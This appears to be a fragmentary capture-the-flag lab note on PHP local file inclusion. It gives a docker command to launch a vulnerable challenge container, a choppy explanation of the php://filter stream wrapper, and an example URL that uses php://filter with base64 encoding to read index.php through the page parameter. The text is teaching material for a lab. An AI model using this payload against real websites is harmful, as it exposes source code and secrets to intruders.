
docker run -d -p 3444:80 --name ctf-php-filter --restart always joshbeck2024/ctf-php-filter

php://filterphp://filter is a built-in PHP stream wrapper.
Think of it like this:
PHP treats both as valid inputs to include().
index.php
php://filter/...
This is a very common technique that allows for LFI (Local File Inclusion)
php://filter resource location in as a GET parameter. (page=somevalue)<http://sem2ctf.icsi.cyber:3444/?page=php://filter/convert.base64-encode/resource=index.php>
